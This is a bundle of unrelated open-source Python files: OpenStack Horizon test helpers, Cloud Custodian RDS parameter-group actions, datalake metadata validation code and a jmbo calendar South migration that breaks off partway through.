keystone_client.Client.tenant_name = 'tenant_1'
keystone_client.Client.management_url = ""
keystone_client.Client.__dir__ = lambda: []
self.keystoneclient = self.mox.CreateMock(keystone_client.Client)
return self.keystoneclient
def stub_glanceclient(self):
if not hasattr(self, "glanceclient"):
self.mox.StubOutWithMock(glanceclient, 'Client')
self.glanceclient = self.mox.CreateMock(glanceclient.Client)
return self.glanceclient
def stub_neutronclient(self):
if not hasattr(self, "neutronclient"):
self.mox.StubOutWithMock(neutron_client, 'Client')
self.neutronclient = self.mox.CreateMock(neutron_client.Client)
return self.neutronclient
def stub_swiftclient(self, expected_calls=1):
if not hasattr(self, "swiftclient"):
self.mox.StubOutWithMock(swift_client, 'Connection')
self.swiftclient = self.mox.CreateMock(swift_client.Connection)
while expected_calls:
swift_client.Connection(None,
mox.IgnoreArg(),
None,
preauthtoken=mox.IgnoreArg(),
preauthurl=mox.IgnoreArg(),
cacert=None,
insecure=False,
auth_version="2.0") \
.AndReturn(self.swiftclient)
expected_calls -= 1
return self.swiftclient
def stub_heatclient(self):
if not hasattr(self, "heatclient"):
self.mox.StubOutWithMock(heat_client, 'Client')
self.heatclient = self.mox.CreateMock(heat_client.Client)
return self.heatclient
def stub_ceilometerclient(self):
if not hasattr(self, "ceilometerclient"):
self.mox.StubOutWithMock(ceilometer_client, 'Client')
self.ceilometerclient = self.mox.\
CreateMock(ceilometer_client.Client)
return self.ceilometerclient
def stub_troveclient(self):
if not hasattr(self, "troveclient"):
self.mox.StubOutWithMock(trove_client, 'Client')
self.troveclient = self.mox.CreateMock(trove_client.Client)
return self.troveclient
def stub_saharaclient(self):
if not hasattr(self, "saharaclient"):
self.mox.StubOutWithMock(sahara_client, 'Client')
self.saharaclient = self.mox.CreateMock(sahara_client.Client)
return self.saharaclient
@unittest.skipUnless(os.environ.get('WITH_SELENIUM', False),
"The WITH_SELENIUM env variable is not set.")
class SeleniumTestCase(horizon_helpers.SeleniumTestCase):
def setUp(self):
super(SeleniumTestCase, self).setUp()
test_utils.load_test_data(self)
self.mox = mox.Mox()
self._real_get_user = utils.get_user
self.setActiveUser(id=self.user.id,
token=self.token,
username=self.user.name,
tenant_id=self.tenant.id,
service_catalog=self.service_catalog,
authorized_tenants=self.tenants.list())
self.patchers = {}
self.patchers['aggregates'] = mock.patch(
'openstack_dashboard.dashboards.admin'
'.aggregates.panel.Aggregates.can_access',
mock.Mock(return_value=True))
self.patchers['aggregates'].start()
os.environ["HORIZON_TEST_RUN"] = "True"
def tearDown(self):
self.mox.UnsetStubs()
utils.get_user = self._real_get_user
mock.patch.stopall()
self.mox.VerifyAll()
del os.environ["HORIZON_TEST_RUN"]
def setActiveUser(self, id=None, token=None, username=None, tenant_id=None,
service_catalog=None, tenant_name=None, roles=None,
authorized_tenants=None, enabled=True):
def get_user(request):
return user.User(id=id,
token=token,
user=username,
tenant_id=tenant_id,
service_catalog=service_catalog,
roles=roles,
enabled=enabled,
authorized_tenants=authorized_tenants,
endpoint=settings.OPENSTACK_KEYSTONE_URL)
utils.get_user = get_user
class SeleniumAdminTestCase(SeleniumTestCase):
"""Version of AdminTestCase for Selenium.
Sets an active user with the "admin" role for testing admin-only views and
functionality.
"""
def setActiveUser(self, *args, **kwargs):
if "roles" not in kwargs:
kwargs['roles'] = [self.roles.admin._info]
super(SeleniumAdminTestCase, self).setActiveUser(*args, **kwargs)
def my_custom_sort(flavor):
sort_order = {
'm1.secret': 0,
'm1.tiny': 1,
'm1.massive': 2,
'm1.metadata': 3,
}
return sort_order[flavor.name]
class PluginTestCase(TestCase):
"""Test case for testing plugin system of Horizon.
For use with tests which deal with the pluggable dashboard and panel
configuration, it takes care of backing up and restoring the Horizon
configuration.
"""
def setUp(self):
super(PluginTestCase, self).setUp()
self.old_horizon_config = conf.HORIZON_CONFIG
conf.HORIZON_CONFIG = conf.LazySettings()
base.Horizon._urls()
# Trigger discovery, registration, and URLconf generation if it
# hasn't happened yet.
self.client.get("/")
# Store our original dashboards
self._discovered_dashboards = base.Horizon._registry.keys()
# Gather up and store our original panels for each dashboard
self._discovered_panels = {}
for dash in self._discovered_dashboards:
panels = base.Horizon._registry[dash]._registry.keys()
self._discovered_panels[dash] = panels
def tearDown(self):
super(PluginTestCase, self).tearDown()
conf.HORIZON_CONFIG = self.old_horizon_config
# Destroy our singleton and re-create it.
base.HorizonSite._instance = None
del base.Horizon
base.Horizon = base.HorizonSite()
# Reload the convenience references to Horizon stored in __init__
reload(import_module("horizon"))
# Re-register our original dashboards and panels.
# This is necessary because autodiscovery only works on the first
# import, and calling reload introduces innumerable additional
# problems. Manual re-registration is the only good way for testing.
for dash in self._discovered_dashboards:
base.Horizon.register(dash)
for panel in self._discovered_panels[dash]:
dash.register(panel)
self._reload_urls()
def _reload_urls(self):
"""CLeans up URLs.
Clears out the URL caches, reloads the root urls module, and
re-triggers the autodiscovery mechanism for Horizon. Allows URLs
to be re-calculated after registering new dashboards. Useful
only for testing and should never be used on a live site.
"""
urlresolvers.clear_url_caches()
reload(import_module(settings.ROOT_URLCONF))
base.Horizon._urls()
class update_settings(django_test_utils.override_settings):
"""override_settings which allows override an item in dict.
django original override_settings replaces a dict completely,
however OpenStack dashboard setting has many dictionary configuration
and there are test case where we want to override only one item in
a dictionary and keep other items in the dictionary.
This version of override_settings allows this if keep_dict is True.
If keep_dict False is specified, the original behavior of
Django override_settings is used.
"""
def __init__(self, keep_dict=True, **kwargs):
if keep_dict:
for key, new_value in kwargs.items():
value = getattr(settings, key, None)
if (isinstance(new_value, collections.Mapping) and
isinstance(value, collections.Mapping)):
copied = copy.copy(value)
copied.update(new_value)
kwargs[key] = copied
super(update_settings, self).__init__(**kwargs)
|
|
# Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from botocore.exceptions import ClientError
from c7n.actions import ActionRegistry, BaseAction
from c7n.filters import FilterRegistry
from c7n.manager import resources
from c7n.query import QueryResourceManager, TypeInfo
from c7n.utils import (type_schema, local_session, chunks)
log = logging.getLogger('custodian.rds-param-group')
pg_filters = FilterRegistry('rds-param-group.filters')
pg_actions = ActionRegistry('rds-param-group.actions')
@resources.register('rds-param-group')
class RDSParamGroup(QueryResourceManager):
"""Resource manager for RDS parameter groups.
"""
class resource_type(TypeInfo):
service = 'rds'
arn_type = 'pg'
enum_spec = ('describe_db_parameter_groups', 'DBParameterGroups', None)
name = id = 'DBParameterGroupName'
dimension = 'DBParameterGroupName'
filter_registry = pg_filters
action_registry = pg_actions
pg_cluster_filters = FilterRegistry('rds-cluster-param-group.filters')
pg_cluster_actions = ActionRegistry('rds-cluster-param-group.actions')
@resources.register('rds-cluster-param-group')
class RDSClusterParamGroup(QueryResourceManager):
""" Resource manager for RDS cluster parameter groups.
"""
class resource_type(TypeInfo):
service = 'rds'
arn_type = 'cluster-pg'
enum_spec = ('describe_db_cluster_parameter_groups', 'DBClusterParameterGroups', None)
name = id = 'DBClusterParameterGroupName'
dimension = 'DBClusterParameterGroupName'
filter_registry = pg_cluster_filters
action_registry = pg_cluster_actions
class PGMixin(object):
def get_pg_name(self, pg):
return pg['DBParameterGroupName']
class PGClusterMixin(object):
def get_pg_name(self, pg):
return pg['DBClusterParameterGroupName']
class Copy(BaseAction):
schema = type_schema(
'copy',
**{
'required': ['name'],
'name': {'type': 'string'},
'description': {'type': 'string'},
}
)
def process(self, param_groups):
client = local_session(self.manager.session_factory).client('rds')
for param_group in param_groups:
name = self.get_pg_name(param_group)
copy_name = self.data.get('name')
copy_desc = self.data.get('description', 'Copy of {}'.format(name))
self.do_copy(client, name, copy_name, copy_desc)
self.log.info('Copied RDS parameter group %s to %s', name, copy_name)
@pg_actions.register('copy')
class PGCopy(PGMixin, Copy):
""" Action to copy an RDS parameter group.
:example:
.. code-block:: yaml
policies:
- name: rds-param-group-copy
resource: rds-param-group
filters:
- DBParameterGroupName: original_pg_name
actions:
- type: copy
name: copy_name
"""
permissions = ('rds:CopyDBParameterGroup',)
def do_copy(self, client, name, copy_name, desc):
client.copy_db_parameter_group(
SourceDBParameterGroupIdentifier=name,
TargetDBParameterGroupIdentifier=copy_name,
TargetDBParameterGroupDescription=desc
)
@pg_cluster_actions.register('copy')
class PGClusterCopy(PGClusterMixin, Copy):
""" Action to copy an RDS cluster parameter group.
:example:
.. code-block:: yaml
policies:
- name: rds-cluster-param-group-copy
resource: rds-cluster-param-group
filters:
- DBClusterParameterGroupName: original_cluster_pg_name
actions:
- type: copy
name: copy_name
"""
permissions = ('rds:CopyDBClusterParameterGroup',)
def do_copy(self, client, name, copy_name, desc):
client.copy_db_cluster_parameter_group(
SourceDBClusterParameterGroupIdentifier=name,
TargetDBClusterParameterGroupIdentifier=copy_name,
TargetDBClusterParameterGroupDescription=desc
)
class Delete(BaseAction):
schema = type_schema('delete')
def process(self, param_groups):
client = local_session(self.manager.session_factory).client('rds')
for param_group in param_groups:
name = self.get_pg_name(param_group)
try:
self.do_delete(client, name)
except ClientError as e:
if e.response['Error']['Code'] == 'DBParameterGroupNotFoundFault':
self.log.warning('RDS parameter group %s already deleted', name)
continue
raise
self.log.info('Deleted RDS parameter group: %s', name)
@pg_actions.register('delete')
class PGDelete(PGMixin, Delete):
"""Action to delete an RDS parameter group
:example:
.. code-block:: yaml
policies:
- name: rds-param-group-delete
resource: rds-param-group
filters:
- DBParameterGroupName: pg_name
actions:
- type: delete
"""
permissions = ('rds:DeleteDBParameterGroup',)
def do_delete(self, client, name):
client.delete_db_parameter_group(DBParameterGroupName=name)
@pg_cluster_actions.register('delete')
class PGClusterDelete(PGClusterMixin, Delete):
"""Action to delete an RDS cluster parameter group
:example:
.. code-block:: yaml
policies:
- name: rds-cluster-param-group-delete
resource: rds-cluster-param-group
filters:
- DBClusterParameterGroupName: cluster_pg_name
actions:
- type: delete
"""
permissions = ('rds:DeleteDBClusterParameterGroup',)
def do_delete(self, client, name):
client.delete_db_cluster_parameter_group(DBClusterParameterGroupName=name)
class Modify(BaseAction):
schema = type_schema(
'modify',
**{
'required': ['params'],
'params': {
'type': 'array',
'items': {
'type': 'object',
'required': ['name', 'value'],
'name': {'type': 'string'},
'value': {'type': 'string'},
'apply-method': {'type': 'string', 'enum': ['immediate', 'pending-reboot']}
},
},
}
)
def process(self, param_groups):
client = local_session(self.manager.session_factory).client('rds')
params = []
for param in self.data.get('params', []):
params.append({
'ParameterName': param['name'],
'ParameterValue': param['value'],
'ApplyMethod': param.get('apply-method', 'immediate'),
})
for param_group in param_groups:
name = self.get_pg_name(param_group)
# Fetch the existing parameters for this DB, so we only try to change the ones that are
# different.
cur_params = self.get_current_params(client, name)
changed_params = []
for param in params:
param_name = param['ParameterName']
if (param_name not in cur_params or
cur_params[param_name]['ParameterValue'] != param['ParameterValue']):
changed_params.append(param)
# Can only do 20 elements at a time per docs, so if we have more than that we will
# break it into multiple requests:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/rds.html#RDS.Client.modify_db_parameter_group
for param_set in chunks(changed_params, 5):
self.do_modify(client, name, param_set)
self.log.info('Modified RDS parameter group %s (%i parameters changed, %i unchanged)',
name, len(changed_params), len(params) - len(changed_params))
@pg_actions.register('modify')
class PGModify(PGMixin, Modify):
"""Action to modify an RDS parameter group
:example:
.. code-block:: yaml
policies:
- name: rds-param-group-modify
resource: rds-param-group
filters:
- DBParameterGroupName: pg_name
actions:
- type: modify
params:
- name: autocommit
value: "1"
- name: max_connections
value: "100"
"""
permissions = ('rds:DescribeDBParameters', 'rds:ModifyDBParameterGroup')
def get_current_params(self, client, name):
params = client.describe_db_parameters(DBParameterGroupName=name)
return {x['ParameterName']: {
'ParameterValue': x.get('ParameterValue'),
'ApplyMethod': x['ApplyMethod']}
for x in params.get('Parameters', [])}
def do_modify(self, client, name, params):
client.modify_db_parameter_group(DBParameterGroupName=name, Parameters=params)
@pg_cluster_actions.register('modify')
class PGClusterModify(PGClusterMixin, Modify):
"""Action to modify an RDS cluster parameter group
:example:
.. code-block:: yaml
policies:
- name: rds-cluster-param-group-modify
resource: rds-cluster-param-group
filters:
- DBClusterParameterGroupName: cluster_pg_name
actions:
- type: modify
params:
- name: lower_case_table_names
value: "1"
- name: master_verify_checksum
value: "1"
"""
permissions = ('rds:DescribeDBClusterParameters', 'rds:ModifyDBClusterParameterGroup')
def get_current_params(self, client, name):
params = client.describe_db_cluster_parameters(DBClusterParameterGroupName=name)
return {x['ParameterName']: {
'ParameterValue': x.get('ParameterValue'),
'ApplyMethod': x['ApplyMethod']}
for x in params.get('Parameters', [])}
def do_modify(self, client, name, params):
client.modify_db_cluster_parameter_group(
DBClusterParameterGroupName=name,
Parameters=params
)
|
|
# Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
from copy import deepcopy
from dateutil.parser import parse as dateparse
from datetime import datetime
from pytz import utc
from uuid import uuid4
import re
import simplejson as json
from simplejson.scanner import JSONDecodeError
import os
import pytz
# as seconds: 5138-11-16 09:46:40
# as milliseconds: 1973-03-03 09:46:40
MAX_TS_SECONDS = 100000000000
try:
long = long
except NameError:
# Python3
long = int
basestring = str
class InvalidDatalakeMetadata(Exception):
pass
class UnsupportedDatalakeMetadataVersion(Exception):
pass
_EPOCH = datetime.fromtimestamp(0, utc)
_WINDOWS_ABS_PATH = re.compile(r'^[a-zA-Z]:\\.+')
class Metadata(dict):
_VERSION = 0
def __init__(self, *args, **kwargs):
'''prepare compliant, normalized metadata from inputs
Args:
kwargs: key-value pairs for metadata fields.
Raises:
InvalidDatalakeMetadata if required fields are missing and cannot
be inferred.
'''
# we want to own all of our bits so we can normalize them without
# altering the caller's data unexpectedly. So deepcopy.
args = deepcopy(args)
kwargs = deepcopy(kwargs)
super(Metadata, self).__init__(*args, **kwargs)
self._ensure_id()
self._ensure_version()
self._validate()
self._normalize_dates()
self._validate_interval() # must occur after normalizing
@classmethod
def from_json(cls, j):
if j is None:
raise InvalidDatalakeMetadata('None is not a valid JSON')
try:
return cls(json.loads(j))
except JSONDecodeError:
msg = '{} is not valid json'.format(repr(j))
raise InvalidDatalakeMetadata(msg)
@property
def json(self):
return json.dumps(self)
def _ensure_id(self):
if 'id' not in self:
self['id'] = uuid4().hex
def _ensure_version(self):
if 'version' not in self:
self['version'] = self._VERSION
def _validate(self):
self._validate_required_fields()
self._validate_version()
self._validate_slug_fields()
self._validate_work_id()
self._validate_path()
_REQUIRED_METADATA_FIELDS = ['version', 'start', 'where', 'what', 'id',
'hash', 'path']
def _validate_required_fields(self):
for f in self._REQUIRED_METADATA_FIELDS:
if self.get(f) is None:
msg = '"{}" is a required field'.format(f)
raise InvalidDatalakeMetadata(msg)
def _validate_version(self):
v = self['version']
if v != self._VERSION:
msg = ('Found version {}. '
'Only {} is supported').format(v, self._VERSION)
raise UnsupportedDatalakeMetadataVersion(msg)
_SLUG_FIELDS = ['where', 'what']
def _validate_slug_fields(self):
[self._validate_slug_field(f) for f in self._SLUG_FIELDS]
def _validate_slug_field(self, f):
if not re.match(r'^[a-z0-9_-]+$', self[f]):
msg = ('Invalid value "{}" for "{}". Only lower-case letters, '
'_ and - are allowed.').format(self[f], f)
raise InvalidDatalakeMetadata(msg)
def _validate_slug_field_with_dots(self, f):
if not re.match(r'^[\.a-z0-9_-]+$', self[f]):
msg = ('Invalid value "{}" for "{}". Only lower-case letters, '
'underscores, dashes, and dots '
'are allowed.').format(self[f], f)
raise InvalidDatalakeMetadata(msg)
def _validate_work_id(self):
if 'work_id' not in self:
msg = '"work_id" is required, but it can be None'
raise InvalidDatalakeMetadata(msg)
if self['work_id'] is None:
return
self._validate_slug_field('work_id')
if self['work_id'] == 'null':
msg = '"work_id" cannot be the string "null"'
raise InvalidDatalakeMetadata(msg)
def _validate_path(self):
if not os.path.isabs(self['path']) and \
not self._is_windows_abs(self['path']):
msg = '{} is not an absolute path.'.format(self['path'])
raise InvalidDatalakeMetadata(msg)
def _is_windows_abs(self, path):
return _WINDOWS_ABS_PATH.match(path) is not None
def _validate_interval(self):
end_val = self['end']
if end_val is None:
return
if end_val < self['start']:
msg = '"end" must be greater than "start"'
raise InvalidDatalakeMetadata(msg)
def _normalize_dates(self):
self['start'] = self.normalize_date(self['start'])
self._normalize_end()
def _normalize_end(self):
end_val = self.setdefault('end', None)
if end_val is not None:
self['end'] = self.normalize_date(end_val)
@staticmethod
def normalize_date(date):
'''normalize the specified date to milliseconds since the epoch
If it is a string, it is assumed to be some sort of datetime such as
"2015-12-27" or "2015-12-27T11:01:20.954". If date is a naive datetime,
it is assumed to be UTC.
If numeric arguments are beyond 5138-11-16 (100,000,000,000 seconds
after epoch), they are interpreted as milliseconds since the epoch.
'''
if isinstance(date, datetime):
pass
elif date == "now":
date = datetime.now(pytz.UTC)
elif isinstance(date, (basestring, int, float, long)):
try:
ts = float(date)
if ts > MAX_TS_SECONDS:
# ts was provided in ms
ts = ts / 1000.0
# For unix timestamps on command line
date = datetime.utcfromtimestamp(float(ts))
except ValueError:
try:
date = dateparse(date)
except ValueError as e:
raise InvalidDatalakeMetadata(str(e))
else:
msg = 'could not parse a date from {!r}'.format(date)
raise InvalidDatalakeMetadata(msg)
return Metadata._from_datetime(date)
@staticmethod
def _from_datetime(date):
if not date.tzinfo:
date = date.replace(tzinfo=utc)
return Metadata._datetime_to_milliseconds(date)
@staticmethod
def _datetime_to_milliseconds(d):
delta = d - _EPOCH
return int(delta.total_seconds()*1000.0)
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from jmbo import USE_GIS
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.external_link'
db.add_column('jmbo_calendar_event', 'external_link',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Event.external_link'
db.delete_column('jmbo_calendar_event', 'external_link')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'jmbo.modelbase': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'},
'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}),
'publish_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}),
'retract_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'jmbo_calendar.calendar': {
'Meta': {'ordering': "('-created',)", 'object_name': 'Calendar', '_ormbases': ['jmbo.ModelBase']},
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'})
},
'jmbo_calendar.event': {
'Meta': {'ordering': "('start',)", 'object_name': 'Event', '_ormbases': ['jmbo.ModelBase']},
'calendars': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'event_calendars'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['jmbo_calendar.Calendar']"}),
'content': ('ckeditor.fields.RichTextField', [], {}),
'end': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'external_link': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent_ptr': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'+'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['jmbo.ModelBase']"}),
'repeat': ('django.db.models.fields.CharField', [], {'default': "'does_not_repeat'", 'max_length': '64'}),
'repeat_until': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'})
},
'photologue.photo': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Photo'},
'caption': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'photo_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'tags': ('photologue.models.TagField', [], {'max_length': '255', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'title_slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'photologue.photoeffect': {
'Meta': {'object_name': 'PhotoEffect'},
'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.59999999999999998'}),
'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'})
},
'publisher.publisher': {
'Meta': {'object_name': 'Publisher'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'secretballot.vote': {
'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
if USE_GIS:
models.update({
'atlas.city': {
'Meta': {'ordering': "('name',)", 'object_name': 'City'},
'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}),
